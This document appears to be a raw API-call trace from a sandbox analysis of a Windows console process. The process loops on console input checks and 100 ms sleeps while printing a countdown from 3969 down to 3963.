[0115.621] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.621] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0115.621] Sleep (dwMilliseconds=0x64)
[0115.730] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.730] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0115.730] Sleep (dwMilliseconds=0x64)
[0115.839] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.839] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0115.839] Sleep (dwMilliseconds=0x64)
[0115.948] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.948] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0115.948] Sleep (dwMilliseconds=0x64)
[0116.057] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.058] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0116.058] Sleep (dwMilliseconds=0x64)
[0116.167] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.167] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0116.167] Sleep (dwMilliseconds=0x64)
[0116.276] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.276] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0116.276] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083969") returned 8
[0116.276] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0116.276] __iob_func () returned 0x757a2900
[0116.276] _fileno (_File=0x757a2920) returned 1
[0116.276] _errno () returned 0x5507d8
[0116.276] _get_osfhandle (_FileHandle=1) returned 0x4c
[0116.276] _errno () returned 0x5507d8
[0116.276] GetFileType (hFile=0x4c) returned 0x2
[0116.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0116.276] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0116.276] lstrlenW (lpString="\x08\x08\x08\x083969") returned 8
[0116.277] GetConsoleOutputCP () returned 0x1b5
[0116.277] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083969", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0116.277] GetConsoleOutputCP () returned 0x1b5
[0116.277] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083969", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083969", lpUsedDefaultChar=0x0) returned 8
[0116.277] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0116.277] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0116.277] Sleep (dwMilliseconds=0x64)
[0116.385] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.385] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0116.385] Sleep (dwMilliseconds=0x64)
[0116.494] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.494] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0116.494] Sleep (dwMilliseconds=0x64)
[0116.603] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.604] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0116.604] Sleep (dwMilliseconds=0x64)
[0116.713] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.713] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0116.713] Sleep (dwMilliseconds=0x64)
[0116.822] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.822] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0116.822] Sleep (dwMilliseconds=0x64)
[0116.931] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0116.931] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0116.931] Sleep (dwMilliseconds=0x64)
[0117.056] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0117.056] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0117.057] Sleep (dwMilliseconds=0x64)
[0117.196] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0117.196] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd0
[0117.196] Sleep (dwMilliseconds=0x64)
[0117.399] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0117.400] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd1
[0117.400] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083968") returned 8
[0117.400] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0117.400] __iob_func () returned 0x757a2900
[0117.400] _fileno (_File=0x757a2920) returned 1
[0117.400] _errno () returned 0x5507d8
[0117.400] _get_osfhandle (_FileHandle=1) returned 0x4c
[0117.400] _errno () returned 0x5507d8
[0117.400] GetFileType (hFile=0x4c) returned 0x2
[0117.400] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0117.400] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0117.400] lstrlenW (lpString="\x08\x08\x08\x083968") returned 8
[0117.400] GetConsoleOutputCP () returned 0x1b5
[0117.400] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083968", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0117.400] GetConsoleOutputCP () returned 0x1b5
[0117.401] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083968", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083968", lpUsedDefaultChar=0x0) returned 8
[0117.401] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0117.401] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0117.401] Sleep (dwMilliseconds=0x64)
[0117.556] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0117.557] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd1
[0117.557] Sleep (dwMilliseconds=0x64)
[0117.742] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0117.743] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd1
[0117.743] Sleep (dwMilliseconds=0x64)
[0117.930] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0117.930] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd1
[0117.930] Sleep (dwMilliseconds=0x64)
[0118.117] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0118.117] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd1
[0118.117] Sleep (dwMilliseconds=0x64)
[0118.304] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0118.304] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd2
[0118.304] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083967") returned 8
[0118.304] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0118.304] __iob_func () returned 0x757a2900
[0118.304] _fileno (_File=0x757a2920) returned 1
[0118.304] _errno () returned 0x5507d8
[0118.304] _get_osfhandle (_FileHandle=1) returned 0x4c
[0118.304] _errno () returned 0x5507d8
[0118.304] GetFileType (hFile=0x4c) returned 0x2
[0118.304] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0118.304] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0118.304] lstrlenW (lpString="\x08\x08\x08\x083967") returned 8
[0118.304] GetConsoleOutputCP () returned 0x1b5
[0118.304] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083967", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0118.304] GetConsoleOutputCP () returned 0x1b5
[0118.305] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083967", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083967", lpUsedDefaultChar=0x0) returned 8
[0118.305] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0118.305] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0118.305] Sleep (dwMilliseconds=0x64)
[0118.491] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0118.491] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd2
[0118.491] Sleep (dwMilliseconds=0x64)
[0118.678] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0118.678] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd2
[0118.678] Sleep (dwMilliseconds=0x64)
[0118.893] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0118.893] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd2
[0118.893] Sleep (dwMilliseconds=0x64)
[0119.068] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0119.068] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd2
[0119.068] Sleep (dwMilliseconds=0x64)
[0119.255] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0119.255] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd3
[0119.255] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083966") returned 8
[0119.256] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0119.256] __iob_func () returned 0x757a2900
[0119.256] _fileno (_File=0x757a2920) returned 1
[0119.256] _errno () returned 0x5507d8
[0119.256] _get_osfhandle (_FileHandle=1) returned 0x4c
[0119.256] _errno () returned 0x5507d8
[0119.256] GetFileType (hFile=0x4c) returned 0x2
[0119.256] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0119.256] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0119.256] lstrlenW (lpString="\x08\x08\x08\x083966") returned 8
[0119.256] GetConsoleOutputCP () returned 0x1b5
[0119.256] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083966", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0119.256] GetConsoleOutputCP () returned 0x1b5
[0119.256] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083966", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083966", lpUsedDefaultChar=0x0) returned 8
[0119.256] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0119.256] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0119.256] Sleep (dwMilliseconds=0x64)
[0119.449] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0119.449] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd3
[0119.449] Sleep (dwMilliseconds=0x64)
[0119.630] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0119.630] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd3
[0119.630] Sleep (dwMilliseconds=0x64)
[0119.802] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0119.802] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd3
[0119.802] Sleep (dwMilliseconds=0x64)
[0119.996] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0119.996] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd3
[0119.996] Sleep (dwMilliseconds=0x64)
[0120.160] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0120.160] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd3
[0120.160] Sleep (dwMilliseconds=0x64)
[0120.357] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0120.357] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0120.357] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083965") returned 8
[0120.357] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0120.358] __iob_func () returned 0x757a2900
[0120.358] _fileno (_File=0x757a2920) returned 1
[0120.358] _errno () returned 0x5507d8
[0120.358] _get_osfhandle (_FileHandle=1) returned 0x4c
[0120.358] _errno () returned 0x5507d8
[0120.358] GetFileType (hFile=0x4c) returned 0x2
[0120.358] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0120.358] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0120.358] lstrlenW (lpString="\x08\x08\x08\x083965") returned 8
[0120.358] GetConsoleOutputCP () returned 0x1b5
[0120.358] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083965", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0120.358] GetConsoleOutputCP () returned 0x1b5
[0120.358] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083965", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083965", lpUsedDefaultChar=0x0) returned 8
[0120.358] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0120.358] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0120.358] Sleep (dwMilliseconds=0x64)
[0120.504] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0120.504] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0120.504] Sleep (dwMilliseconds=0x64)
[0120.619] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0120.619] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0120.619] Sleep (dwMilliseconds=0x64)
[0120.722] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0120.722] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0120.722] Sleep (dwMilliseconds=0x64)
[0120.831] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0120.831] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0120.831] Sleep (dwMilliseconds=0x64)
[0120.940] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0120.940] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0120.940] Sleep (dwMilliseconds=0x64)
[0121.049] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.050] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0121.050] Sleep (dwMilliseconds=0x64)
[0121.158] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.159] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd4
[0121.159] Sleep (dwMilliseconds=0x64)
[0121.268] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.268] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0121.268] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083964") returned 8
[0121.268] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0121.268] __iob_func () returned 0x757a2900
[0121.268] _fileno (_File=0x757a2920) returned 1
[0121.268] _errno () returned 0x5507d8
[0121.268] _get_osfhandle (_FileHandle=1) returned 0x4c
[0121.268] _errno () returned 0x5507d8
[0121.268] GetFileType (hFile=0x4c) returned 0x2
[0121.268] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0121.268] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0121.268] lstrlenW (lpString="\x08\x08\x08\x083964") returned 8
[0121.268] GetConsoleOutputCP () returned 0x1b5
[0121.268] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083964", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0121.269] GetConsoleOutputCP () returned 0x1b5
[0121.269] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083964", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083964", lpUsedDefaultChar=0x0) returned 8
[0121.269] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0121.269] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0121.269] Sleep (dwMilliseconds=0x64)
[0121.377] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.377] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0121.377] Sleep (dwMilliseconds=0x64)
[0121.486] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.487] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0121.487] Sleep (dwMilliseconds=0x64)
[0121.595] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.596] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0121.596] Sleep (dwMilliseconds=0x64)
[0121.705] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.705] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0121.705] Sleep (dwMilliseconds=0x64)
[0121.814] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.815] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0121.815] Sleep (dwMilliseconds=0x64)
[0121.923] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0121.923] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0121.923] Sleep (dwMilliseconds=0x64)
[0122.032] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.032] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0122.032] Sleep (dwMilliseconds=0x64)
[0122.141] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.142] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd5
[0122.142] Sleep (dwMilliseconds=0x64)
[0122.251] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0122.251] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fd6
[0122.251] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083963") returned 8
[0122.251] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0122.251] __iob_func () returned 0x757a2900
[0122.251] _fileno (_File=0x757a2920) returned 1
[0122.251] _errno () returned 0x5507d8
[0122.251] _get_osfhandle (_FileHandle=1) returned 0x4c
[0122.251] _errno () returned 0x5507d8
